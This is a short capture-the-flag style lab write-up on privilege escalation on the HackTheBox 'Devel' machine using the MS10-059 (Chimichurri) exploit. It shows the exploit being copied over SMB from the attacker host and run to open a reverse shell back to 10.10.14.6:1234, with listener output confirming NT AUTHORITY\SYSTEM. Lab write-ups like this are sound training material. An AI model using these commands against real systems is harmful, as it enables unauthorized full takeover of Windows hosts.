InfoSec LAB

Devel_Privilege_Escalation_2

Created: 2 min read

CVE-2010-2554(MS10-059)

The Tracing Feature for Services in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 has incorrect ACLs on its registry keys, which allows local users to gain privileges via vectors involving a named pipe and impersonation, aka “Tracing Registry Key ACL Vulnerability.”

this vulnerability was also known as ms10-059 as can be seen below posted by Microsoft

Microsoft also noted a list of affected systems including the one that matches the target system

according to rapid7, attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability.

found the exploit online

c:\tmp>copy \\10.10.14.6\smb\MS10-059.exe
copy \\10.10.14.6\smb\MS10-059.exe
        1 file(s) copied.
 
c:\tmp>.\MS10-059.exe
.\MS10-059.exe
/chimichurri/-->this exploit gives you a local system shell <br>/chimichurri/-->usage: Chimichurri.exe ipaddress port <BR>
 
c:\tmp>.\MS10-059.exe 10.10.14.6 1234
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>

The exploit binary was transferred to the target machine over SMB and executed

┌──(kali㉿kali)-[~/archive/htb/labs/devel]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.5] 49167
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
c:\tmp> whoami
 whoami
nt authority\system
 
c:\tmp> hostname
 hostname
devel
 
c:\tmp> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
ethernet adapter local area connection 3:
 
   connection-specific dns suffix  . : 
   ipv6 address. . . . . . . . . . . : dead:beef::58c0:f1cf:abc6:bb9e
   temporary ipv6 address. . . . . . : dead:beef::c66:ff0d:1e4:87d3
   link-local ipv6 address . . . . . : fe80::58c0:f1cf:abc6:bb9e%15
   ipv4 address. . . . . . . . . . . : 10.10.10.5
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%15
                                       10.10.10.2
 
tunnel adapter isatap.{c57f02f8-df4f-40ee-bc21-a206b3f501e4}:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . : 
 
tunnel adapter local area connection* 9:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . :

Received the shell as NT AUTHORITY\SYSTEM

Interactive Graph View

Backlinks